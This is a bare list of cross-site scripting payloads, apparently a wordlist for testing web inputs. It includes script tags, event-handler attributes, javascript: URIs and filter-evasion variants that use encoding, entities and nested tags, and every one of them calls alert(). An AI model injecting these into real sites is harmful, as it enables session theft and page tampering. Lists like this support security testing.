# XSS Payloads
<script>alert('XSS')</script>
<script>alert(1)</script>
<script>alert(document.cookie)</script>
<img src=x onerror=alert('XSS')>
<img src=x onerror=alert(1)>
<svg onload=alert('XSS')>
<svg/onload=alert(1)>
<body onload=alert('XSS')>
<input onfocus=alert('XSS') autofocus>
<marquee onstart=alert('XSS')>
<details open ontoggle=alert('XSS')>
<video><source onerror=alert('XSS')>
"><script>alert('XSS')</script>
'><script>alert('XSS')</script>
"><img src=x onerror=alert('XSS')>
'><img src=x onerror=alert(1)>
"><svg onload=alert('XSS')>
" onfocus=alert('XSS') autofocus="
' onfocus=alert('XSS') autofocus='
javascript:alert('XSS')
data:text/html,<script>alert('XSS')</script>
<iframe src="javascript:alert('XSS')">
<a href="javascript:alert('XSS')">click</a>
<div onmouseover=alert('XSS')>hover me</div>
<ScRiPt>alert('XSS')</ScRiPt>
<scr<script>ipt>alert('XSS')</scr</script>ipt>
%3Cscript%3Ealert('XSS')%3C/script%3E
&lt;script&gt;alert('XSS')&lt;/script&gt;
<script>alert(String.fromCharCode(88,83,83))</script>
<img src=x onerror=alert(String.fromCharCode(88,83,83))>
<svg><script>alert&#40;1&#41;</script></svg>
<math><mi><xss onclick=alert(1)>click
<img """><script>alert("XSS")</script>">
<<script>alert('XSS');//<</script>
'";!--<xss>=&{()}
<object data="javascript:alert('XSS')">
<embed src="javascript:alert('XSS')">
<img src=x onerror="&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041">
